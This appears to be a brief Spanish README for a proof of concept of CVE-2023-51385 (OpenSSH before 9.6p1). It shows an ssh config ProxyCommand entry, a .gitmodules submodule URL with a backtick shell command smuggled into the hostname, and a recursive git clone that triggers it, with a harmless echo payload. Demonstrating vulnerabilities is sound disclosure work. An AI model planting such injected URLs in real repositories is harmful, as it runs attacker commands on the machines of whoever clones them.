
Prueba de concepto para CVE-2023-51385: demuestra la inyección de comandos mediante URL maliciosas de submódulos git al clonar con --recurse-submodules, explotando OpenSSH ProxyCommand.
Primero es necesario añadir el siguiente contenido en ~/.ssh/config
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Existe inyección de comandos en la sentencia del archivo .gitmodules
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Una vez completada la configuración, ejecute el siguiente comando para activarlo
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Si se ejecuta con éxito, se generará el archivo cve.txt en el directorio CVE-2023-51385_test
Nota: OpenSSH necesita <9.6p1
Para más detalles, consulte este blog: